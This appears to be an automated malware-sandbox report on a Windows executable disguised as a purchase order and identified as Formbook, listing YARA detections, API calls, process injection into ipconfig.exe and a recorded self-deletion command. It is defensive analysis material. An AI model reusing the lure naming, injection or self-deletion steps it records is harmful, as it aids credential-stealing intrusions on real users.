          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: Purchase Order 40,7045$.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Purchase Order 40,7045$.exe
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417BA0 NtCreateFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417C50 NtReadFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417CD0 NtClose,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417D80 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417C4C NtReadFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417CCA NtClose,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17BA0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17CD0 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17C50 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17CCA NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17C4C NtReadFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E9969
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E91F9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E8D64
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E9D51
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E9597
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E07F6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041C16E
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00408A40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00408A3B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041BF03
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B090
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041002
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105E824
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010520A8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010528EC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8F900
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052B28
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104DBD2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010403DA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FA2B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBEBB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010522AE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAB40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052D07
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051D55
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010525DD
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9841F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104D466
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F80D20
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA6E30
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105DFCE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051FF1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104D616
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F422AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F303DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F428EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F420A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F31002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E96E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F425DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E70D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B08A3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B08A40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1C16E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1BF03
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: String function: 013E0550 appears 47 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: String function: 013EDBFD appears 32 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: String function: 013DB9F5 appears 624 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: String function: 00F8B150 appears 54 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02E7B150 appears 48 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@17/13
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
          Source: Purchase Order 40,7045$.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order 40,7045$.exeVirustotal: Detection: 43%
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile read: C:\Users\user\Desktop\Purchase Order 40,7045$.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: Purchase Order 40,7045$.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,
